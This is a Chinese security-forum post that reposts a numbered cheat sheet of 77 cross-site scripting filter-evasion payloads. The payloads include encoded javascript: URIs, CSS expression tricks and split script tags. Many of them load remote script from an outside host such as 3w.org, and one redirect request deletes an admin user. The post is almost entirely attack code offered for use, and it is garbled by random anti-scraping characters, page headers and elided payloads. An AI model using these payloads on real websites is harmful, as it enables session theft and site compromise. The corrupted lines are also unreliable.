中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

---

作者: admin    时间: 2013-4-19 19:22
标题: XSS攻击汇总
貌似关于xss的资料t00ls比较少，看见好东西Copy过来，不知道有木有童鞋需要Mark的。
(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( H7 N7 R5 R+ l" d4 a) b4 U(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3)IMG标签无分号无引号
<IMG SRC=javascript:alert(‘XSS’)>
(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert(“XSS”)>
9 t: c% f/ B! C4 m& C9 V- [(6)修正缺陷IMG标签
/ n4 ?0 T" H0 M- M! A! e<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
. a5 S/ ~5 l4 {+ T
' H# M0 B8 }$ Q  ~5 n
(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
9 M+ {: M4 o& V4 [# Y: \" v, H0 u(8)UTF-8的Unicode编码(计算器)
* ?# O/ h* x7 _4 p. F" L* B<IMG SRC=jav..省略..S')>
" o3 e: X! _  Y' u- F0 k(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>
(10)十六进制编码也是没有分号(计算器)
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
(11)嵌入式标签,将Javascript分开
( K5 }3 a# z$ l<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 p3 N7 ^6 ?9 f: p% _(12)嵌入式编码标签,将Javascript分开
  I1 P6 G! Y6 y. w<IMG SRC=”jav ascript:alert(‘XSS’);”>
: B8 Y; q2 Z2 e; G(13)嵌入式换行符
& w) h; Y4 ]0 Y+ q& m8 g" }<IMG SRC=”jav ascript:alert(‘XSS’);”>
, `. O9 p; L: x7 N3 x& F(14)嵌入式回车
  T: Z* b3 r3 A<IMG SRC=”jav ascript:alert(‘XSS’);”>
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC=”javascript:alert(‘XSS‘)”>
(16)解决限制字符(要求同页面)
1 R( T. v2 o- p! S0 A<script>z=’document.’</script>
1 X+ i* Z8 k% X  l1 o7 R  N* B. R<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
+ n% K" L* U+ v0 ^# Y<script>z=z+’ src=ht’</script>
3 `1 `7 B% }. [<script>z=z+’tp://ww’</script>
( }( u6 w8 r+ o; ~. p<script>z=z+’w.shell’</script>
, C& A% o2 x+ n2 n! B+ i9 Z* ?" I<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
4 M. @7 w! e# d, c<script>eval_r(z)</script>
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
8 D' m/ }: Z" D* x% a, h4 m0 chttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 E9 o% J% F6 s6 b# E: B(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
5 o( J, w, E2 \8 f2 c0 \+ o* Mperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
(19)Spaces和meta前的IMG标签
<IMG SRC=” javascript:alert(‘XSS’);”>
' \: ^  n( _$ L) e(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
- Q6 J1 v$ @6 @8 s* [- \: ~(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
(22)Non-alpha-non-digit XSS to 3
8 M0 C& Q. O! k; h3 z<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
. q2 t: r* a% P0 b# q5 b. q(23)双开括号
# M7 |/ `5 g# k+ e' \<<SCRIPT>alert(“XSS”);//<</SCRIPT>
(24)无结束脚本标记(仅火狐等浏览器)
  h* Q# \) y: ~$ M0 {% Y8 {& B/ |<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>
. P9 j/ h# _3 e6 N) W(26)半开的HTML/JavaScript XSS
<IMG SRC=”javascript:alert(‘XSS’)”
(27)双开角括号
3 o2 i1 j3 S1 B/ D) `, u<iframe src=http://3w.org/XSS.html <
(28)无单引号 双引号 分号
- i9 F7 K9 ^' {<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
3 x0 F- X; g' m- N0 |  t+ _(29)换码过滤的JavaScript
\”;alert(‘XSS’);//
  [. o4 v! O0 n' |0 e$ c(30)结束Title标签
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
(31)Input Image
<INPUT SRC=”javascript:alert(‘XSS’);”>
. @, W& ~6 t3 b+ C  H4 u(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
(33)BODY标签
) C! V5 ], \: l+ Q1 g<BODY(‘XSS’)>
6 U9 F! h' C: P) ](34)IMG Dynsrc
  L* w# |3 I4 ~<IMG DYNSRC=”javascript:alert(‘XSS’)”>
(35)IMG Lowsrc
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
(36)BGSOUND
3 l( |3 H/ I: R( R! z<BGSOUND SRC=”javascript:alert(‘XSS’);”>
(37)STYLE sheet
2 r- Y6 D) V) n<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
(38)远程样式表
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
(39)List-style-image(列表式)
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! N/ m0 e- Y( F; m$ e(40)IMG VBscript
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
. r' b1 W. Y! _9 a(41)META链接url
, W" a& m2 z: ~7 U2 D( w/ z/ v

<META HTTP-EQUIV=”refresh” CONTENT=”0;
- p' N! Y* B% \0 B9 }/ k. vURL=http://;URL=javascript:alert(‘XSS’);”>
(42)Iframe
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
$ }' O  ~$ h0 s% t6 c/ G2 c(43)Frame
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
& h- Y" V( p% ]+ |: f5 n2 `(44)Table
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
- w" t# k+ Y5 Z% f(45)TD
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
(46)DIV background-image
4 Q1 T, `* O6 m  J<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
8&13&12288&65279)
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
5 N: `1 }& |3 h4 f(48)DIV expression
6 F/ P: H2 x2 N( O<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
(49)STYLE属性分拆表达
. m# R6 E1 q" Y3 w<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
(50)匿名STYLE(组成:开角号和一个字母开头)
8 h2 ?$ _2 ]) o/ s: l7 I% j. t: u<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
# N, I9 H/ T6 }5 A8 ~(51)STYLE background-image
2 f" o8 t: J$ B<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
) A6 T& r4 y# yCLASS=XSS></A>
(52)IMG STYLE方式
exppression(alert(“XSS”))’>
(53)STYLE background
/ g1 Z) O; y: Y0 A- [  w2 g6 c1 z<STYLE><STYLE
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
! @  `' L4 j& q/ [(54)BASE
0 r* x1 U5 {) q. T5 s& ~<BASE HREF=”javascript:alert(‘XSS’);//”>
4 Y/ A& H' u5 ~& W" @(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
, n( `1 B  y, q( j# A<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
(56)在flash中使用ActionScrpt可以混进你XSS的代码
2 n: M- c, q+ O: P* ~2 x1 Wa=”get”;
" o( T9 j) `2 d" E5 F% u$ f( Qb=”URL(\”";
3 d3 v; J* ^1 ~7 N1 mc=”javascript:”;
" }8 \9 [* |* E5 kd=”alert(‘XSS’);\”)”;
( b1 m' d9 X4 w3 z* Deval_r(a+b+c+d);
( j" ~2 b8 j4 r' X/ H* i(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
! F8 ]6 D9 B; T- X$ @6 T; O5 \<HTML xmlns:xss>
4 M& U: z( b% Y; t<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
7 E# ?& y8 V: @% F. T: y<xss:xss>XSS</xss:xss>
% N! K6 w9 j' c  M9 u; h</HTML>
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
* H' x8 [$ t) D$ E# ~<SCRIPT SRC=””></SCRIPT>
) b# I0 c( i* e(59)IMG嵌入式命令,可执行任意命令
. M( }' R$ m' b<IMG SRC=”http://www.XXX.com/a.php?a=b”>
(60)IMG嵌入式命令(a.jpg在同服务器)
) C7 Q! _" n' d1 Q: |" nRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
( {" Y3 n/ i  N3 K0 s4 p3 b' e; h9 I! j(61)绕符号过滤
/ j+ @; K$ J; v3 \5 H; W# T/ x. F<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
(62)
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
(63)
% i  `3 T# u. X5 z4 v<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
9 }5 j9 g) r+ i6 }# X  c3 k1 d(64)
7 ?4 W  r9 I4 u" c2 y<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
5 }$ {( e3 |! S( G(65)
4 t% k! U8 u* F3 P, C# w. r0 ~1 b<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
(66)12-7-1 T00LS - Powered by Discuz! Board
1 J- `0 l% c# chttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
# ]/ @8 u: ?4 U  t0 q4 G# ~8 M: ^8 n& Q(67)
0 O, X' t# O$ D) i1 E<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
</SCRIPT>
5 a$ R2 {) G. Y6 {) E(68)URL绕行
( Y* k# o) r$ i  m" K# g/ w<A HREF=”http://127.0.0.1/”>XSS</A>
(69)URL编码
<A HREF=”http://3w.org”>XSS</A>
(70)IP十进制
. n9 V1 E- ~  d1 i3 b3 V* E, a<A HREF=”http://3232235521″>XSS</A>
(71)IP十六进制
+ q) L7 ?( n) ~<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
(72)IP八进制
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
! `5 C8 q; `) ~(73)混合编码
<A HREF=”h
, I, ~" p1 m# r0 Ftt p://6 6.000146.0×7.147/”">XSS</A>
(74)节省[http:]
<A HREF=”//www.google.com/”>XSS</A>
(75)节省[www]
<A HREF=”http://google.com/”>XSS</A>
(76)绝对点绝对DNS
- R$ A" a% d7 X  M<A HREF=”http://www.google.com./”>XSS</A>
- y6 v+ T8 b2 c/ m6 r/ S! l(77)javascript链接
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>

原文地址：http://fuzzexp.org/u/0day/?p=14
  D# ~8 z/ |. r# p: v0 L
& n0 Q4 K3 [8 H8 V& w

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2